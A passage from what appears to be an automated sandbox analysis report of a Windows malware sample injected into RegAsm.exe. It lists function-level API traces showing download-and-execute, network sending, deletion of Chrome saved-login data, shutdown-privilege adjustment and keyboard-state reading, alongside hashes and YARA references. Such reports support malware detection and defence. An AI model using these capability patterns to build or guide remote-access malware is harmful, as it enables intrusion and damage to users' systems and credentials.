                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                          • String ID:
                          • API String ID: 1888522110-0
                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                          Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressCloseCreateLibraryLoadProcsend
                          • String ID: SHDeleteKeyW$Shlwapi.dll
                          • API String ID: 2127411465-314212984
                          • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                          • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                          Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00449292
                          • _free.LIBCMT ref: 004492B6
                          • _free.LIBCMT ref: 0044943D
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                          • _free.LIBCMT ref: 00449609
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                          Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                          • String ID: !D@$PowrProf.dll$SetSuspendState
                          • API String ID: 1589313981-2876530381
                          • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                          • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                          Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                          • GetLastError.KERNEL32 ref: 0040BA93
                          Strings
                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                          • UserProfile, xrefs: 0040BA59
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • API String ID: 2018770650-1062637481
                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                          Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                          • GetLastError.KERNEL32 ref: 004179D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeShutdownPrivilege
                          • API String ID: 3534403312-3733053543
                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                          Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00409293
                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00D64950,00000010), ref: 004048E0
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                          • FindClose.KERNEL32(00000000), ref: 004093FC
                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                          • FindClose.KERNEL32(00000000), ref: 004095F4
                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                          • String ID:
                          • API String ID: 1824512719-0
                          • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                          • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                          Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandle$Open$ManagerStart
                          • String ID:
                          • API String ID: 276877138-0
                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                          Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                          Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                          Download Yara Rule
                          APIs
                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SETTINGS
                          • API String ID: 3473537107-594951305
                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                          Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 004096A5
                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstH_prologNext
                          • String ID:
                          • API String ID: 1157919129-0
                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                          Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 0040884C
                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                          • String ID:
                          • API String ID: 1771804793-0
                          • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                          • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                          Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                          Download Yara Rule
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadExecuteFileShell
                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                          • API String ID: 2825088817-3056885514
                          • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                          • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                          Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNextsend
                          • String ID: XPG$XPG
                          • API String ID: 4113138495-1962359302
                          • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                          • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                          Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateInfoParametersSystemValue
                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                          • API String ID: 4127273184-3576401099
                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                          Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID: p'E$JD
                          • API String ID: 1084509184-908320845
                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                          Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorInfoLastLocale$_free$_abort
                          • String ID:
                          • API String ID: 2829624132-0
                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                          Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
